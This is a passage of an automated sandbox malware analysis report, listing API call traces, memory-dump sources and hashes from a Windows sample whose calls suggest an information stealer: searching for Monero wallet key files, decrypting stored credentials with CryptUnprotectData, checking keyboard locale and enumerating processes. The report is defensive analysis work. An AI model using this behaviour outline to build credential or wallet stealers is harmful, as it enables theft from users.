                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B0,00360C2A), ref: 0034DAEB
                            • StrCmpCA.SHLWAPI(?,003614B4), ref: 0034DB33
                            • StrCmpCA.SHLWAPI(?,003614B8), ref: 0034DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0034DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: d869d142c96f7f1de8a82895a94f18632f553e4a7e4941bd421f32fe4a5430b2
                            • Instruction ID: 97bf038507ed816fb7f7d0ac91f2505cfde2451640cfd5611cc48b797141a90b
                            • Opcode Fuzzy Hash: d869d142c96f7f1de8a82895a94f18632f553e4a7e4941bd421f32fe4a5430b2
                            • Instruction Fuzzy Hash: C491747290060497CB16FBB0EC56DED777CAF98301F408659FD0A9E151EE34AB0D9B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *W$&SA$Ao$Ao$Qoo}$S^m$fmu>$k
                            • API String ID: 0-2769721139
                            • Opcode ID: aad46151c938c2cde5d3b060af5cd579f327f753d82eb25dd0d24425652a0acf
                            • Instruction ID: b9cce1f85eba55d3da258fe0b17b3e4935406a549472ca8cb7e90fd6ea9fc07f
                            • Opcode Fuzzy Hash: aad46151c938c2cde5d3b060af5cd579f327f753d82eb25dd0d24425652a0acf
                            • Instruction Fuzzy Hash: D9B206F3A082109FE3046E2DEC8567AFBE5EF94320F1A893DE6C4C7744E63598458796
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
                            • LocalFree.KERNEL32(00000000), ref: 00357D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
                            • Instruction ID: 9666f6d0d2da6f650ceb0f5366fcfd7c4a407eed8eec851a26380b3d228e3f21
                            • Opcode Fuzzy Hash: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
                            • Instruction Fuzzy Hash: BB416F71940218ABDB25DB94DC89FEEB7B8FF44701F1042D9E809661A0DB342F89DFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -Rj$1w{$4I_]$4}$Fhw~$c7ok$'_
                            • API String ID: 0-3014980375
                            • Opcode ID: d58239d1a4531e32e515af4d1c8762768e8c3ede36a98e85ab26a7393418b108
                            • Instruction ID: 6823c716f477b739b14ea8643fe09e42b80134db0de6edd3eb2d6bca04cbcd43
                            • Opcode Fuzzy Hash: d58239d1a4531e32e515af4d1c8762768e8c3ede36a98e85ab26a7393418b108
                            • Instruction Fuzzy Hash: 08B206F360C2049FE304AE29DC4567AFBE9EF94720F1A893DE6C5C7744EA3598418693
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00360D73), ref: 0034E4A2
                            • StrCmpCA.SHLWAPI(?,003614F8), ref: 0034E4F2
                            • StrCmpCA.SHLWAPI(?,003614FC), ref: 0034E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 44fe1b5cd0264dc1a591374727c2f093bf46cbce2cfbac4aabe97702085b9577
                            • Instruction ID: bd99af1c764b13050292e4e42d58e7bbb33be44c4de7270e73a9c6b8cc054bb4
                            • Opcode Fuzzy Hash: 44fe1b5cd0264dc1a591374727c2f093bf46cbce2cfbac4aabe97702085b9577
                            • Instruction Fuzzy Hash: 581264319105189ADB16FB60DC96EED7778BF54301F404299B90AAA0A1FF306F4DEF92
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                            • LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N4
                            • API String ID: 4291131564-2877227682
                            • Opcode ID: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
                            • Instruction ID: 567afea89e5745b0b3eefb066b0798207c86a85a6f2e5689ecae565c07cc3599
                            • Opcode Fuzzy Hash: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
                            • Instruction Fuzzy Hash: 60119DB4240208EFEB10CF64DC95FAA77B5EB89700F208059FE159F390C7B6A901DBA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: QO}$kE]~$oCV6$}u~$}ar
                            • API String ID: 0-921041181
                            • Opcode ID: 14e5af26baa838caa063e99d92a19dc5c632aaf5b6b740b3b30a9a9178f34ea0
                            • Instruction ID: 00282356f84f9dff55bdf66dffca54ecb17491cfac1cec2f70b79b14a2e740dc
                            • Opcode Fuzzy Hash: 14e5af26baa838caa063e99d92a19dc5c632aaf5b6b740b3b30a9a9178f34ea0
                            • Instruction Fuzzy Hash: 90B229F3A082049FE3046E2DEC8567ABBE5EFD4720F1A4A3DEAC5C3744E63558058697
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
                            • lstrcat.KERNEL32(?,00360B46), ref: 0034C943
                            • lstrcat.KERNEL32(?,00360B47), ref: 0034C957
                            • lstrcat.KERNEL32(?,00360B4E), ref: 0034C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
                            • Instruction ID: f0e41e7eed53afa36956fded784817d9190ee5f226a6ec881647ce9157ab2f0c
                            • Opcode Fuzzy Hash: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
                            • Instruction Fuzzy Hash: 06416DB5D1421AEBDB10CF90DC89BEEB7B8AB48304F1041A9E509B7284D7746A84DFA1
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0035696C
                            • sscanf.NTDLL ref: 00356999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569C0
                            • ExitProcess.KERNEL32 ref: 003569DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
                            • Instruction ID: 81137ec2bc5a5aa6c811636b0a3d515ef294a63a415a1306fd6d87c1210466b7
                            • Opcode Fuzzy Hash: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
                            • Instruction Fuzzy Hash: 7D21EA75D10208ABDF04EFE4D945DEEB7B5BF48301F04852AE806F3250EB345609DB65
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00347254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00347281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003472A4
                            • LocalFree.KERNEL32(?), ref: 003472AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
                            • Instruction ID: 2b8e4a7125cbc6d7f52cf407a5c5edfe91f2d53dea5e17f15c8bb7a396634b91
                            • Opcode Fuzzy Hash: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
                            • Instruction Fuzzy Hash: 78010CB5A40208BBEB14DFD4CD4AF9E77B8EB44B00F104555FB05BA2C0D6B0AA049B65
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0035961E
                            • Process32First.KERNEL32(00360ACA,00000128), ref: 00359632
                            • Process32Next.KERNEL32(00360ACA,00000128), ref: 00359647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0035965C
                            • CloseHandle.KERNEL32(00360ACA), ref: 0035967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
                            • Instruction ID: f1356414889b343083a51e497c3b00fefbaccb9f85040f5b90a263b534831446
                            • Opcode Fuzzy Hash: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
                            • Instruction Fuzzy Hash: 61014C75A00208EBDB11DFA4CC48FEDB7F8EB18311F10418AAD06A7250D7349B48DF51
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00345184,40000001,00000000,00000000,?,00345184), ref: 00358EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
                            • Instruction ID: de79274782890ab6157e29351952b5b57f49d752b180212f29ec8ae429d0a281
                            • Opcode Fuzzy Hash: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
                            • Instruction Fuzzy Hash: BC110670200208AFDB01CF64EC85FAA33A9AF89305F109448FD1A9B260DB35E849EB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FBDEC0,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FBDEC0,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D
                            • wsprintfA.USER32 ref: 00357AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
                            • Instruction ID: 80d00f46cc3b92038be748f0a790f86011bd52bcb779cd57212ec67c17de5865
                            • Opcode Fuzzy Hash: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
                            • Instruction Fuzzy Hash: 4B115EB1D45218EBEB208B54DC49FAAB778FB04721F10439AEE1AA32D0D7745A48CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: 78}v$;vf${@z
                            • API String ID: 0-3765021230
                            • Opcode ID: 86f88ec5208b84d5c07e4bfd0647b7f507f8f1bdd2c07fda4c183db17fdfa33e
                            • Instruction ID: 01164b9f130f347939563935b3a1f39347f7578fb79d5fe1d6f2d8a07ba53499
                            • Opcode Fuzzy Hash: 86f88ec5208b84d5c07e4bfd0647b7f507f8f1bdd2c07fda4c183db17fdfa33e
                            • Instruction Fuzzy Hash: BEB2D6F260C204AFE304AE29EC8567AFBE9EF94720F16493DE6C4C3744EA3558458797
                            APIs
                            • CoCreateInstance.COMBASE(0035E118,00000000,00000001,0035E108,00000000), ref: 00353758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003537B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
                            • Instruction ID: bef2c9eb68e244717e77a2f13ec893a6822debd0c548252a8027279bbf5644ab
                            • Opcode Fuzzy Hash: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
                            • Instruction Fuzzy Hash: E941F971A00A189FDB24DB58CC94F9BB7B4BB48702F4051D8EA08EB2E0D7716E89CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
                            • LocalFree.KERNEL32(?), ref: 00349BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
                            • Instruction ID: cf9b2388e6abef8248b8de3d6c9c484d2106e4119ca2e79567b4207f58506fda
                            • Opcode Fuzzy Hash: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
                            • Instruction Fuzzy Hash: DD11A5B8A00209EFDB05DF94D985AAEB7B5FB88300F104599ED15AB350D774AE14CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: 3yww$I 6
                            • API String ID: 0-4004495414
                            • Opcode ID: 79d50df5c63e05bac4c0fff3486ee12e28675a545e3c6fd93f5542b360a85d67
                            • Instruction ID: 92f20c5a219848d9dbd31dfa86872d90f22c32a59602254787084b8f9592f8b5
                            • Opcode Fuzzy Hash: 79d50df5c63e05bac4c0fff3486ee12e28675a545e3c6fd93f5542b360a85d67
                            • Instruction Fuzzy Hash: E0B209F3A0C2109FE304AE2DEC8567ABBE9EF94320F1A853DE6C5D7744E93558018796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: }7_
                            • API String ID: 0-480581156
                            • Opcode ID: 6b2a779d526ba3a9c3c795dc73b03b46a1fa8ca493bfe15d4b700910ee66762f
                            • Instruction ID: 46d73c75b1d8cccfff8cf61a0d02327c971d2ea494ec8b34da389e042ebd2ba8
                            • Opcode Fuzzy Hash: 6b2a779d526ba3a9c3c795dc73b03b46a1fa8ca493bfe15d4b700910ee66762f
                            • Instruction Fuzzy Hash: 5AA2E5F390C2049FE304AE29EC8567AFBE9EF94720F16492DEAC4C7344E63598458797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: $W$AR>
                            • API String ID: 0-3542059997
                            • Opcode ID: 20e4ba2d992577e4226f9b0303d7b33c35c59fcb52b02e84b14dbf41e311742b
                            • Instruction ID: 42eeb0a1076f1a884f03dfc84fa85bdc7b6ae626f7b99d659c44dca8a242f170
                            • Opcode Fuzzy Hash: 20e4ba2d992577e4226f9b0303d7b33c35c59fcb52b02e84b14dbf41e311742b
                            • Instruction Fuzzy Hash: 974186F3A087141BE308696CEC85767B2CADB90220F2A823EEA84D3380FC795C0542C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: c,vW
                            • API String ID: 0-3052020306
                            • Opcode ID: fc973f77d3612c2072e180cc04e09aa49fc22a7ba7223921958d36faf495c7b5
                            • Instruction ID: f334c0474e9cc746d90c68af34cf02a758ffa7bab90eeda69a0aee85a50bf067
                            • Opcode Fuzzy Hash: fc973f77d3612c2072e180cc04e09aa49fc22a7ba7223921958d36faf495c7b5
                            • Instruction Fuzzy Hash: E3517DF3E1C6109FE3041A2DDC847A6B6D6EBD8324F2BC63DE684D3788E9755C018685
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID: M?L
                            • API String ID: 0-1957247074
                            • Opcode ID: d813d30ccb83d34713b70e1b4bea9e544d27d24516366f8b39ee18d1033cbaeb
                            • Instruction ID: 6b1f56d24e7c92673ff6cd8e89e408845a41f0ef15bc3342aef6ff47f77b58d2
                            • Opcode Fuzzy Hash: d813d30ccb83d34713b70e1b4bea9e544d27d24516366f8b39ee18d1033cbaeb
                            • Instruction Fuzzy Hash: F851F4B360D204EFE3086E19AC9167BF7E9EBD5320FA5473DE6C247310E9396800E646
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94aa699a30d598d18c41acd30c37dcc5aacecd135834e4ca6f1e378d974a0eeb
                            • Instruction ID: db803b2e01a02774b58e0a0774cb4cd948af8210f8514fbffae84e0ec08b2dd5
                            • Opcode Fuzzy Hash: 94aa699a30d598d18c41acd30c37dcc5aacecd135834e4ca6f1e378d974a0eeb
                            • Instruction Fuzzy Hash: DC5149B39181109FE3049B29DC417BABBE6EF94320F1A8A3DE9C8D7744E6394C5187D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9341e428aae73b0b17378a4da0558bc7c06c4aa8f688ba32851233b73396a04
                            • Instruction ID: c4144d1e5d889d13ce9d422b0ec42f559a18924d6bad3401554284dc829b462e
                            • Opcode Fuzzy Hash: a9341e428aae73b0b17378a4da0558bc7c06c4aa8f688ba32851233b73396a04
                            • Instruction Fuzzy Hash: FA5155F3A082144BE7146E2CDC4977ABBE5EB90320F06463DDFC987784E936590883C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88697b4c2b1542ebc09310a6817f3202826b939713b6b897853bebb8ce241ad0
                            • Instruction ID: 4db35ccf2c0a37c7baed2902173d1bdbd56c3959b19a2ee12ffcf5821474f7fe
                            • Opcode Fuzzy Hash: 88697b4c2b1542ebc09310a6817f3202826b939713b6b897853bebb8ce241ad0
                            • Instruction Fuzzy Hash: 315106F3B186045FF300A92DEC817BB77D6DBD4760F29C639A784C3B84E97898054295
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8e148c84a64d108cbc21a7f7ce725d14dc4904c1855244a23d00f6cb5e732797
                            • Instruction ID: 9f9094c135d1f232b09fc03c2d3895c4790523a5ad5dddf47423e76235c9e06f
                            • Opcode Fuzzy Hash: 8e148c84a64d108cbc21a7f7ce725d14dc4904c1855244a23d00f6cb5e732797
                            • Instruction Fuzzy Hash: AB5106F29087049FE3086F2DEC9533AB7E5EF94720F1A463DE5D5C7380EA396845864A
                            Memory Dump Source
